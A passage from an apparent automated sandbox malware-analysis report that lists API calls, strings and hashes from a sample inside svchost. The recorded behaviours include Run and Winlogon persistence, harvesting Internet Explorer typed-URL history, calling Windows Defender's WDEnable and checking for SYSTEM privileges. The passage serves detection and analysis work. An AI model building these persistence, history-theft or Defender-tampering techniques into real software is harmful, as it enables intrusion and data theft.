                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 02C93BFA
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 02C93C1C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 02C93C28
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 02C93C36
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?,00000000), ref: 02C74803
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7482B
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,762335B0), ref: 02C74862
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C74FAE,00000000), ref: 02C7488C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3BE4,00000001,02C74FAE,00000000), ref: 02C7489E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C74FAE,00000000), ref: 02C748CA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C74FAE,00000000), ref: 02C748DC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C748F7
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C7490D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 995291462-0
                                                                                                                                                                                                                    • Opcode ID: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                                    • Instruction ID: a6d5ba3fe5b7dc7c35c181564afb746dc971d058794fad2efa10cf46b787aa8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3310372E40254BBDB218FA59C48FABBB7CEF80B14F108658FD14A7280D7308A148BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                    • String ID: 80F50759a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 217510255-3483679399
                                                                                                                                                                                                                    • Opcode ID: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                                    • Instruction ID: 3471b68e4a835b0fa5063bde680b29b635e56a2b8e81eeee3e7ffb16df0b7b1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD310871E4026D6AEB26DB649C09BDE7B6CEF04704F100599EA1DE7141E7B08B44CBE1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76111
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7612F
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C7614A
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000001,80F50759a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C76171
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                    • String ID: 80F50759a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 217510255-3483679399
                                                                                                                                                                                                                    • Opcode ID: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                                    • Instruction ID: 01ab0bc2ad4d45cd08dc3ae6a38c052b133b4db611de5721e0a942fd5e20b490
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41312871E8025C6BDB26DB64DC49FDE7BACEF18704F104598E609E7141E3B08B448BA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                    • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                    • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E88
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                     • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                                    • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                                    • API String ID: 1998047302-3691563785
                                                                                                                                                                                                                    • Opcode ID: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                                    • Instruction ID: 7f2bd8690ff1dfab9be954a6c89663d6062ef08d3c0c7ee721daf379dcadf0f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C531A171D40288BBEF11CBA1C88CFBE7B7CAF85306F048598ED8667181D7749615CB62
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 00402037
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402046
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                    • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                                    • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                    • String ID: Windows Explorer
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: GetProcessHeap.KERNEL32(00000008,02C93547,00000000,75B534D0,7736C3F0,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D6E
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: HeapAlloc.KERNEL32(00000000,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D75
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: memset.MSVCRT ref: 02C82D85
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                                    • StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02C934B0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                                    • String ID: 80f50249a
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02C83432
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 1484339481-3673152959
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SymGetModuleBase.DBGHELP(00000000,?,?,?), ref: 02C73889
                                                                                                                                                                                                                    • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C7389C
                                                                                                                                                                                                                    • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C738B3
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C738DD
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73901
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                                    • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                                    • API String ID: 844136142-2194319270
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C822C8
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C822FF
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,80F50315a,00000000,02C859A4,00000000,?,?,02C859A4), ref: 02C8231C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82326
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C82359
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80F50315a,00000000,?,00000000,02C859A4,?,02C859A4), ref: 02C82376
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82380
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80F50315a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-2756871673
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C88B18
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02C88CD7), ref: 02C88B4F
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(02C88CD7,80f5035da,00000000,?,00000000,?), ref: 02C88B6C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(02C88CD7), ref: 02C88B76
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C88BA9
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80f5035da,00000000,?,00000000,?), ref: 02C88BC6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C88BD0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80f5035da$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-1475967691
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,80f502cfa,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80f502cfa,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                                    Memory Dump Source
